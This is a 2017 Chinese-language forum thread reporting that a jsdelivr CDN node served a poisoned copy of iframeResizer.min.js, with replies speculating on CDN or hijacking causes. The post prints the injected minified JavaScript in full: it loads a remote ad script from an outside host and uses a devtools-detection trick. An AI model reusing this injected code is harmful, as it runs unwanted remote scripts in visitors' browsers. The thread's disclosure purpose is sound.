V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
sexrobot
V2EX  ›  程序员

如果你也在用 jsdelivr,那么请小心,他的节点会投毒。

  •  2
     
  •   sexrobot · 2017-11-03 02:54:02 +08:00 · 24390 次点击
    这是一个创建于 2587 天前的主题,其中的信息可能已经有所发展或是发生改变。
    $ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js -v
    *   Trying 101.66.227.63...
    * TCP_NODELAY set
    * Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0)
    * ALPN, offering h2
    * ALPN, offering http/1.1
    * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
    * successfully set certificate verify locations:
    *   CAfile: /etc/ssl/cert.pem
      CApath: none
    * TLSv1.2 (OUT), TLS handshake, Client hello (1):
    * TLSv1.2 (IN), TLS handshake, Server hello (2):
    * TLSv1.2 (IN), TLS handshake, Certificate (11):
    * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
    * TLSv1.2 (IN), TLS handshake, Server finished (14):
    * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
    * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
    * TLSv1.2 (OUT), TLS handshake, Finished (20):
    * TLSv1.2 (IN), TLS change cipher, Client hello (1):
    * TLSv1.2 (IN), TLS handshake, Finished (20):
    * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
    * ALPN, server accepted to use h2
    * Server certificate:
    *  subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net
    *  start date: Apr 20 00:00:00 2014 GMT
    *  expire date: Apr 19 23:59:59 2019 GMT
    *  subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net"
    *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
    *  SSL certificate verify ok.
    * Using HTTP2, server supports multi-use
    * Connection state changed (HTTP/2 confirmed)
    * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
    * Using Stream ID: 1 (easy handle 0x7f9e9c00aa00)
    > GET /gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js HTTP/2
    > Host: cdn.jsdelivr.net
    > User-Agent: curl/7.54.0
    > Accept: */*
    >
    * Connection state changed (MAX_CONCURRENT_STREAMS updated)!
    < HTTP/2 200
    < date: Thu, 02 Nov 2017 18:49:08 GMT
    < content-type: application/x-javascript
    < content-length: 682
    < cache-control: max-age=604800
    < age: 1
    < x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0)
    <
    
    * Connection #0 to host cdn.jsdelivr.net left intact
    (function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()%
    

    里面的 xf.yellowto.com ,是个广告脚本。 因为走了 Https,所以可能性如下:

    1. 官方干的;
    2. 网宿 CDN 干的( quantl 是网宿参股公司,quantl 国内节点为网宿实际运营);
    3. CDN 回原站走了 HTTP,被国家劫持?
    11 条回复    2020-12-04 08:35:44 +08:00
    sexrobot
        1
    sexrobot  
    OP
       2017-11-03 04:02:53 +08:00
    jsdelivr 响应很快,确认是 CDN 服务商网宿投毒,现在已经全部切换回了 CloudFlare。
    WoadZS
        2
    WoadZS  
       2017-11-03 04:37:45 +08:00 via Android
    @sexrobot 那岂不是国内访问速度直接尿崩
    WoadZS
        3
    WoadZS  
       2017-11-03 04:49:37 +08:00
    jsdelivr 官方的回复是并不确定问题所在,只是在等待网宿回复,切换回 CloudFlare 也是临时性的举动。
    RqPS6rhmP3Nyn3Tm
        4
    RqPS6rhmP3Nyn3Tm  
       2017-11-03 05:32:49 +08:00 via iPhone
    网宿作为 cdn 企业也会干这种事?以后谁敢用啊
    missdeer
        5
    missdeer  
       2017-11-03 07:35:33 +08:00 via Android
    @BXIA 放心吧,国内消费者都是好了伤疤忘了疼的
    n329291362
        6
    n329291362  
       2017-11-03 08:10:59 +08:00
    emmmm 我们这里用的七牛融合 cdn 也遇到了一样的脚本
    n329291362
        7
    n329291362  
       2017-11-03 08:11:24 +08:00
    全程 https 不知道 看来应该是 cdn 投的
    miyuki
        8
    miyuki  
       2017-11-03 08:12:40 +08:00 via Android
    卧槽
    oott123
        9
    oott123  
       2017-11-03 08:50:34 +08:00 via Android
    我猜应该是回源 http 被劫持了…这听起来太可怕了
    wsy2220
        10
    wsy2220  
       2017-11-03 12:16:37 +08:00
    明显回源的时候被劫持了
    wwwwzf
        11
    wwwwzf  
       2020-12-04 08:35:44 +08:00
    用得少
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1160 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 18:49 · PVG 02:49 · LAX 10:49 · JFK 13:49
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.